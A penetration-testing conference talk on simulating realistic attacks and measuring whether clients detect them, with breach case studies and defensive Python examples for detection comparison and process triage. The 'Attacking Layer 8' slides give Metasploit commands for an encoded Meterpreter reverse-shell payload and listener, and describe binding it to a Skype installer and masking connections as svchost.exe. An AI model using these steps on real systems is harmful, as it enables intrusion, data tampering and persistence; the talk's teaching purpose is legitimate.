Simulating Real World Attacks
Thomas Mackenzie
Acknowledgements

Chris Nickerson


Carlos Perez

Simon Whitehouse
Introduction / Scope
Are clients aware of attacks happening to them?

If they are not, how can we help them?

How can we test whether they are aware of an attack?
Remediation of an Attack
Remediation -
 Step One - fixing the vulnerability that was exploited
 Step Two - dealing with what happened post-exploitation
Case Study
Lush.co.uk

They found out about the attack at the end of January

They stated that the attack started, "they think", on the 4th October
Case Study cont.
Zurich UK

Lost 46,000 customer records

Found out 1 year later

Cost £2.28 million in fines - not to mention the cost of fixing it
Case Study cont.
Chain of events -
 When did it start?
 When did it end?
 What information was available to the attacker?
 What information was compromised?


Not counting -
 How it happened.
 How to stop it from happening again.
What am I saying?
Yes -
 If they had known about the vulnerability in the first place
 they could have stopped this from happening.

But they didn't -
 The attack happened and it has cost them money, not just to
 fix the vulnerability but to work through the chain of events too.
Attacks we see
Layer 8 (Management)


Development Issues


0-Days


Passive Actions / Obfuscation Methods
Attacks we see cont.
These attacks are what we are seeing at the
moment.


When we do testing for clients we stop at the
vulnerability.


We stop at the exploit and we do not carry on.
Attacks we see cont.
Stopping at the vulnerability means -
 The client gets to do Step One of remediation

What about Step Two?
It is important!!!
Without the proper things in place it can take a long time to deal with this.

[Bar chart by detection method: Self Detection, Law Enforcement, Public Detection, Regulatory Detection; horizontal axis 0 to 200]
Why didn’t they know?
There are a lot of things in place at the
moment that help people detect attacks / even
stop them.
 IDS / IPS / FW / Logs etc.


Attacks are still occurring and we are still
hearing about them all the time.
Why didn't they know? cont.
Do we test this in our pen test?

How can we test whether they are aware of an attack?

Certainly not by just exploiting the vulnerability; we have to go deeper.
Is it Real?


Unless what you do is real your
client WILL NOT CARE!
Ask them!

Ask them what they care about


Why do they care?
The Brand
Employees
Customers
Money
Unless...

Unless the attack happens for real they don’t
have to deal with the aftermath!


Are they prepared?
IR
Not all companies have IR teams

How long does it take for the attacker's trail to be found?

Knowing you have been compromised = good

When and how long for = better
Reporting
When it comes to the report, attack them with simulated examples - examples you could recreate.
 Could you kill someone?
 Can you steal money?
 Can you change / recreate their product?
Report cont.
Give a time window / speak to only one person


Document everything you do


Ask them what they saw you do


Compare
Did they know?
Did they know you were attacking them?

If so, did they try to stop you?

If not, why not!
Noise Levels
Low -
 Ninja Hacking Skillz




Medium -
 Make a few mistakes that should be detected




High -
 Scan them to hell and back
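The comparison the Report slides call for (agree a window, document what you did, ask what they saw, compare), worked through as an added example; this is not code from the talk. Each tester action carries the noise level from the Noise Levels slide, each client report is something their IDS / IPS / firewall / logs or staff noticed, and the two are joined on a shared indicator (source address, account or hostname) inside a grace period, which is this example's assumption about how the two logs line up. All log lines are constructed.

```python
"""Compare the tester's own activity log with what the client reported seeing.

Added example, not code from the talk. Actions and reports are joined on a
shared indicator inside a grace period (an assumption about how the logs line
up); the output is per-action detection, time to detect, and the detection
rate per noise level. Every log line below is constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Action:
    when: datetime
    noise: str       # "low", "medium" or "high", as on the Noise Levels slide
    indicator: str   # what a defender could have keyed on
    what: str


@dataclass(frozen=True)
class Report:
    when: datetime
    indicator: str
    what: str


def match(actions, reports, grace=timedelta(hours=24)):
    """Pair each action with the earliest unused client report that shares its
    indicator and falls within `grace` after it.
    Returns [(action, report or None, latency or None)] in time order."""
    paired = []
    used = set()
    for a in sorted(actions, key=lambda x: x.when):
        best = None
        for i, r in enumerate(reports):
            if i in used or r.indicator != a.indicator:
                continue
            if a.when <= r.when <= a.when + grace:
                if best is None or r.when < reports[best].when:
                    best = i
        if best is None:
            paired.append((a, None, None))
        else:
            used.add(best)
            paired.append((a, reports[best], reports[best].when - a.when))
    return paired


def detection_rate(paired):
    """Fraction of actions the client saw, per noise level."""
    seen, total = {}, {}
    for a, r, _ in paired:
        total[a.noise] = total.get(a.noise, 0) + 1
        seen[a.noise] = seen.get(a.noise, 0) + (1 if r is not None else 0)
    return {n: seen[n] / total[n] for n in total}


def time_to_first_detection(paired):
    """Gap between the tester's first action and the client's first relevant
    report, or None if they never noticed anything (the 'when and how long for'
    number from the IR slide)."""
    first = min(a.when for a, _, _ in paired)
    noticed = [r.when for _, r, _ in paired if r is not None]
    return min(noticed) - first if noticed else None


# Constructed logs for a two-day window. Addresses are documentation ranges.
T = datetime(2011, 3, 1, 9, 0)
ACTIONS = [
    Action(T,                      "high",   "198.51.100.7",     "full port scan of the DMZ"),
    Action(T + timedelta(hours=1), "medium", "198.51.100.7",     "password spray against the VPN"),
    Action(T + timedelta(hours=3), "low",    "ceo@corp.example", "sent the bound Skype installer"),
    Action(T + timedelta(hours=4), "low",    "CEO-LAPTOP",       "Meterpreter session, added a local admin"),
    Action(T + timedelta(days=1),  "medium", "CEO-LAPTOP",       "copied the CEO's mailbox out to a test host"),
]
REPORTS = [
    Report(T + timedelta(minutes=20),      "198.51.100.7", "IPS: port sweep, source address blocked"),
    Report(T + timedelta(days=1, hours=5), "CEO-LAPTOP",   "helpdesk: laptop 'running slow', AV scan run"),
]


if __name__ == "__main__":
    paired = match(ACTIONS, REPORTS)
    for a, r, lag in paired:
        print("%-6s %-45s -> %s" % (a.noise, a.what, "seen after %s" % lag if r else "NOT SEEN"))
    print("detection rate by noise level:", detection_rate(paired))
    print("time to first detection:", time_to_first_detection(paired))
```

On the constructed logs the noisy scan is seen in 20 minutes, the quiet Meterpreter session is never attributed (the helpdesk ticket lands after the grace period), and the mailbox copy is only noticed five hours later, which is the per-level picture the Graded Levels slide is after. The grace period is the knob to agree with the client beforehand: too short and late-but-genuine detections count as misses, too long and unrelated tickets get credited.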
Graded Levels
Level 1 - 5

From Script Kiddie (Level 1) to Criminal (Level 5)
What are we doing!


Attacking systems with real results instead of
just giving information they don’t care about.
Methods
The low-hanging fruit are the first checkpoints a defender will look at:
 processes, connections, the EventLog and in some cases memory dumps
Processes
Time of creation


Parent PID


Owner


Command Line
Hide!
Hide your connections

svchost.exe looks normal connecting out to high ports

Firefox, Dropbox and AV updaters look normal on 80 and 443

The catch: a genuine svchost.exe is a child of services.exe, runs from System32 under a service account and carries a -k group on its command line, so the Processes checks above (parent PID, owner, command line, creation time) catch a copy that only borrows the name
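The Processes and Hide! slides taken together, as an added example that is not code from the talk: it runs the four process checks (time of creation, parent PID, owner, command line) and a per-program port profile over a constructed process and connection snapshot. On a real host you would fill PROCESSES and CONNECTIONS from tasklist /v, netstat -ano, Sysinternals or psutil; the hosts, pids and addresses here are made up.

```python
"""Triage a process/connection snapshot for the masquerading on the Hide! slide.

Added example, not code from the talk. The snapshot below is constructed; on a
real host fill PROCESSES and CONNECTIONS from tasklist /v, netstat -ano,
Sysinternals or psutil.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    path: str
    owner: str
    cmdline: str
    created: datetime


@dataclass(frozen=True)
class Conn:
    pid: int          # owning process, as netstat -ano reports it
    raddr: str
    rport: int


SERVICE_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE",
                    "NT AUTHORITY\\NETWORK SERVICE"}
SYSTEM32 = "c:\\windows\\system32\\"
# Programs that only talk on web ports. svchost.exe is deliberately absent: real
# service hosts use all sorts of ports, which is exactly why an implant borrows the name.
EXPECTED_PORTS = {"firefox.exe": {80, 443}, "dropbox.exe": {80, 443}}


def check_process(p, by_pid, since):
    """Reasons a single process looks wrong; an empty list means it passed."""
    reasons = []
    if p.name.lower() == "svchost.exe":
        parent = by_pid.get(p.ppid)
        if parent is None or parent.name.lower() != "services.exe":
            reasons.append("parent is %s, expected services.exe"
                           % (parent.name if parent else "pid %d (gone)" % p.ppid))
        if not p.path.lower().startswith(SYSTEM32):
            reasons.append("image %s is not under System32" % p.path)
        if p.owner not in SERVICE_ACCOUNTS:
            reasons.append("owner %s is not a service account" % p.owner)
        if " -k " not in p.cmdline:
            reasons.append("command line %r has no -k service group" % p.cmdline)
    if p.created >= since:
        reasons.append("created %s, inside the test window" % p.created.isoformat())
    return reasons


def check_connection(c, by_pid, suspicious):
    """Reasons a connection looks wrong, given the process verdicts so far."""
    p = by_pid.get(c.pid)
    if p is None:
        return ["connection to %s:%d owned by pid %d with no visible process"
                % (c.raddr, c.rport, c.pid)]
    allowed = EXPECTED_PORTS.get(p.name.lower())
    if allowed is not None and c.rport not in allowed:
        return ["%s talking to %s:%d, outside its usual ports %s"
                % (p.name, c.raddr, c.rport, sorted(allowed))]
    if c.pid in suspicious:
        return ["connection to %s:%d from an already-suspicious process" % (c.raddr, c.rport)]
    return []


def triage(processes, connections, since):
    """Map pid -> findings. A pid missing from the result passed every check."""
    by_pid = {p.pid: p for p in processes}
    findings = {}
    for p in processes:
        reasons = check_process(p, by_pid, since)
        if reasons:
            findings[p.pid] = reasons
    for c in connections:
        reasons = check_connection(c, by_pid, findings)
        if reasons:
            findings.setdefault(c.pid, []).extend(reasons)
    return findings


# Constructed snapshot. T0 is when the tester sent the bound installer; pid 4321 is the
# implant, dropped in %TEMP% as svchost.exe and launched from the CEO's Explorer session.
T0 = datetime(2011, 3, 1, 9, 0)
SYS = "NT AUTHORITY\\SYSTEM"
OLD = T0 - timedelta(days=3)
PROCESSES = [
    Proc(600, 500, "services.exe", "C:\\Windows\\System32\\services.exe", SYS, "C:\\Windows\\System32\\services.exe", OLD),
    Proc(912, 600, "svchost.exe", "C:\\Windows\\System32\\svchost.exe", SYS, "C:\\Windows\\System32\\svchost.exe -k netsvcs", OLD),
    Proc(1500, 600, "svchost.exe", "C:\\Windows\\System32\\svchost.exe", "NT AUTHORITY\\NETWORK SERVICE", "C:\\Windows\\System32\\svchost.exe -k NetworkService", OLD),
    Proc(2000, 1800, "explorer.exe", "C:\\Windows\\explorer.exe", "CORP\\ceo", "C:\\Windows\\Explorer.EXE", T0 - timedelta(hours=2)),
    Proc(3000, 2000, "firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "CORP\\ceo", "\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"", T0 - timedelta(hours=1)),
    Proc(3100, 2000, "Dropbox.exe", "C:\\Users\\ceo\\AppData\\Roaming\\Dropbox\\bin\\Dropbox.exe", "CORP\\ceo", "Dropbox.exe /systemstartup", T0 - timedelta(hours=1)),
    Proc(4321, 2000, "svchost.exe", "C:\\Users\\ceo\\AppData\\Local\\Temp\\svchost.exe", "CORP\\ceo", "svchost.exe", T0 + timedelta(minutes=2)),
]
CONNECTIONS = [
    Conn(1500, "203.0.113.10", 443),   # genuine service host fetching updates
    Conn(3000, "203.0.113.20", 443),   # Firefox on 443, as expected
    Conn(3100, "203.0.113.30", 443),   # Dropbox lives under AppData and is still fine
    Conn(4321, "198.51.100.7", 4444),  # implant calling back to the Meterpreter handler
    Conn(5555, "198.51.100.7", 443),   # socket owned by a pid the process list does not show
]

if __name__ == "__main__":
    for pid, reasons in sorted(triage(PROCESSES, CONNECTIONS, T0).items()):
        print(pid, *reasons, sep="\n    ")
```

The port profile on its own would pass the implant, because svchost.exe has no fixed port profile; it is the parent, image path, owner, missing -k group and creation time that give it away. Note that a user-profile path is only damning for a binary claiming to be a system service: Dropbox genuinely lives under AppData and is not flagged. A connection whose owning pid is missing from the process list is reported separately, since that is what a hidden or already-exited process looks like from netstat.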
Example
So what are we actually talking about?

How can we go about simulating an attack like the one we have just spoken about?
Ask and you shall receive

Brief


Discuss options for testing


What is important to them?
Seek and you will find
What was important to them?

Are there any exploits / 0-days for that piece of software?
Knock and the door will be opened
Simply: do not give up

There is always going to be some avenue of attack for this client; they may just not know about it

Look at the following example
Attacking Layer 8
Idiots in the company are your first port of call.

Is the CEO an idiot?

Skype is important to them - attack them with what is important!
Attacking Layer 8 cont.
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o payload.exe
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
exploit

(LHOST=x.x.x.x takes no spaces; R writes the raw payload to stdout for msfencode, and -c 5 runs five encoding passes. Later Metasploit releases retired msfpayload and msfencode in favour of msfvenom, which does both steps in one command.)
Attacking Layer 8 cont.
Using IExpress (the self-extracting package builder that ships with Windows) you can bind a legitimate primary .exe and your payload together

Settings available in IExpress [screenshot]

Running that evil .exe (BANG) reverse shell!
Do not leave it there!
What did I say at the beginning?


Once you have shell do something with it so
that it actually means something to them


Delete data / change data / get addresses /
create ways to stay there!
But WAIT!!! POLITICS!

You cannot just delete data without
permission!


Make sure you find out what you can do!
If you can delete...


You most likely can add
What is better?
This? [screenshot]

What is better?
This? [screenshot]
WHAT IS ALL THIS!
By simulating these attacks the way I am talking about, the client can then see exactly what they would need to do if it was a real attack!
Future


@sponex and I are creating a website about
this and some guides that link to some good
methodologies out there.
Summary
Attack them, don't pussyfoot around!

Find out what they care about.

Make them realise how hard it would be to fix.
:~$ whoami
Director of upSploit Limited
Soon to be Web Application Security Consultant for Trustwave
British Student
Podcaster
Questions
   thomas@tmacuk.co.uk

www.tmacuk.co.uk / @tmacuk

www.upsploit.com / @upsploit
